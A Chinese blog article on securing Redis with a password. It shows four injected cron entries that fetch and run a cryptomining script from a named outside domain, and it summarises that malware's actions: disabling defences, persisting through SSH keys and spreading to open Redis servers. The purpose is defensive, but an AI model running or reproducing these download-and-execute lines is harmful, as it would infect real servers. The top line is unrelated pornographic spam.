欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

一文詳解Redis為什么一定要設置密碼原理

 更新時間:2023年03月14日 09:42:13   作者:佳慶  
這篇文章主要為大家介紹了Redis為什么一定要設置密碼原理詳解,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進步,早日升職加薪

為什么redis要設置密碼?

內網環(huán)境可以不設置密碼,但是個人服務器,以及線上公網服務器就有必要設置密碼了。

昨天我查看了一下minio的redis事件通知,查看redis的key時發(fā)現(xiàn)多了幾個奇怪的key。backup1,backup2,backup3。然后我猜想應該是挖礦病毒。

如下面所示:這樣就將定時任務和腳本注入到了我們機器當中,就會開始執(zhí)行 init.sh 腳本

backup1 "\n\n\n*/2 * * * * root cd1 -fsSL http://en2an.top/cleanfda/init.sh | sh\n\n"
backup2 "\n\n\n*/3 * * * * root wget -q -O- http://en2an.top/cleanfda/init.sh | sh\n\n"
backup3 "\n\n\n*/4 * * * * root curl -fsSL http://en2an.top/cleanfda/init.sh | sh\n\n"
backup4 "\n\n\n*/5 * * * * root wd1 -q -O- http://en2an.top/cleanfda/init.sh | sh\n\n"

init.sh腳本內容是什么?

en2an.top/cleanfda/in…

我們查看這個key的value能得到它會去請求一個地址,我們打開看一下這個init.sh到底是什么東西。

如下圖所示是個腳本文件。

這個腳本還挺多的,關閉selinux、殺掉別人的挖礦進程、殺掉CPU占用過高的進程,如果是自己就跳過、修改破壞系統(tǒng)命令、自己造一個下載器downloads()函數、解鎖和加鎖定時任務、添加挖礦技術任務、設置SSH免密登陸、下載執(zhí)行礦機挖礦程序、關閉防火墻、清除日志、感染已知的免密機器、下載執(zhí)行is.sh。

is.sh腳本內容是什么?

en2an.top/cleanfda/is…

如下圖所示,上面的init.sh會下載我們的is.sh腳本。

我們看一下這個腳本是干什么。

如下圖所示,這個腳本的內容也挺多的。下載masscan掃描器、下載pnscan掃描器、安裝 redis 用于創(chuàng)建 redis 未授權訪問的漏洞、執(zhí)行 rs.sh。

rs.sh腳本內容是什么?

en2an.top/cleanfda/rs…

上面的連接可以查看這個腳本內容是什么。

開放 6379 端口、自動化利用redis未授權寫入定時任務,利用 pnscan 掃描b段IP 6379 端口,利用 masscan 進行掃描端口。

Redis如何設置密碼?

經過以上分析,就知道這個病毒主要是通過你的redis注入進去執(zhí)行挖礦腳本。如果你的redis沒有設置密碼,而且暴露在公網上就要小心了。

可以通過以下兩種方式對我們的redis進行設置密碼。

方式一:修改我們的redis.conf配置文件

需要注意的是這種方式因為修改了配置文件, 需要重新啟動我們的redis才能生效。

找到我們的redis.conf文件。

Windows如下圖所示

我們編輯此文件,找到requirepass,放開注釋,設置指定的值就,重啟redis就生效了。

Linux的話,因為大家的安裝方式可能不同,我這邊是通過docker安裝的,做了映射的。這里就不給大家演示了,找到自己安裝在linux的redis目錄找到redis.conf配置文件,跟windows一樣的操作,配置完重啟就Ok了。

方式二

連接我們的redis,然后通過指令的方式設置密碼。

這種方式比較簡單,而且不需要重啟就生效。

下面的指令的意思就是把密碼設置為123456,公網可不要設置這么簡單阿。

config set requirepass 123456

我們查看一下我們的redis的密碼。

config get requirepass 

這樣我們的密碼就設置成功了,退出我們的redis客戶端再次連接的時候就生效了。

總結

公網的redis一定要設置密碼阿,不要不設置密碼,設置密碼就一個指令,非常容易,可不要偷懶噢。

以上就是一文詳解Redis為什么一定要設置密碼原理的詳細內容,更多關于Redis設置密碼的資料請關注腳本之家其它相關文章!

相關文章

  • 淺談Redis的異步機制

    淺談Redis的異步機制

    命令操作、系統(tǒng)配置、關鍵機制、硬件配置等會影響 Redis 的性能,還要提前準備好應對異常的方案,本文主要介紹了Redis的異步機制,文中通過示例代碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友們下面隨著小編來一起學習學習吧
    2022-05-05
  • Linux上安裝Redis詳細教程

    Linux上安裝Redis詳細教程

    這篇文章主要給大家詳細介紹了在Linux上安裝Redis詳細教程,文中有詳細的代碼示例和安裝步驟,對我們學習安裝redis有一定的幫助,需要的朋友可以參考下
    2023-07-07
  • Redis key命令key的儲存方式

    Redis key命令key的儲存方式

    這篇文章主要介紹了Redis key命令key的儲存方式,具有很好的參考價值,希望對大家有所幫助,如有錯誤或未考慮完全的地方,望不吝賜教
    2024-04-04
  • Redis在項目中的使用(JedisPool方式)

    Redis在項目中的使用(JedisPool方式)

    項目操作redis是使用的RedisTemplate方式,另外還可以完全使用JedisPool和Jedis來操作redis,本文給大家介紹Redis在項目中的使用,JedisPool方式,感興趣的朋友跟隨小編一起看看吧
    2021-12-12
  • Redis教程(十五):C語言連接操作代碼實例

    Redis教程(十五):C語言連接操作代碼實例

    這篇文章主要介紹了Redis教程(十五):C語言連接操作代碼實例,本篇博客是該系列博客中的最后一篇,在這里將給出基于Redis客戶端組件訪問并操作Redis服務器的代碼示例,需要的朋友可以參考下
    2015-05-05
  • 詳解Redis?鍵和字符串常用命令

    詳解Redis?鍵和字符串常用命令

    字符串是?Redis?最基本的數據結構,它將以一個鍵?和一個值?儲存在?Redis?內部,本文重點給大家介紹Redis鍵和字符串常用命令,感興趣的朋友一起看看吧
    2022-02-02
  • 使用Redis實現(xiàn)用戶積分排行榜的教程

    使用Redis實現(xiàn)用戶積分排行榜的教程

    這篇文章主要介紹了使用Redis實現(xiàn)用戶積分排行榜的教程,包括一個用PHP腳本進行操作的例子,需要的朋友可以參考下
    2015-04-04
  • Redis 實現(xiàn)隊列原理的實例詳解

    Redis 實現(xiàn)隊列原理的實例詳解

    這篇文章主要介紹了Redis 實現(xiàn)隊列原理的實例詳解的相關資料,希望通過本文能幫助到大家,需要的朋友可以參考下
    2017-09-09
  • 基于redis實現(xiàn)世界杯排行榜功能項目實戰(zhàn)

    基于redis實現(xiàn)世界杯排行榜功能項目實戰(zhàn)

    前段時間,做了一個世界杯競猜積分排行榜。對世界杯64場球賽勝負平進行猜測,猜對+1分,錯誤+0分,一人一場只能猜一次。下面通過本文給大家分享基于redis實現(xiàn)世界杯排行榜功能項目實戰(zhàn),感興趣的朋友一起看看吧
    2018-10-10
  • redis的2種持久化方案深入講解

    redis的2種持久化方案深入講解

    這篇文章主要給大家介紹了關于redis的2種持久化方案的相關資料,文中通過示例代碼介紹的非常詳細,對大家學習或者使用redis具有一定的參考學習價值,需要的朋友們下面來一起學習學習吧
    2019-05-05

最新評論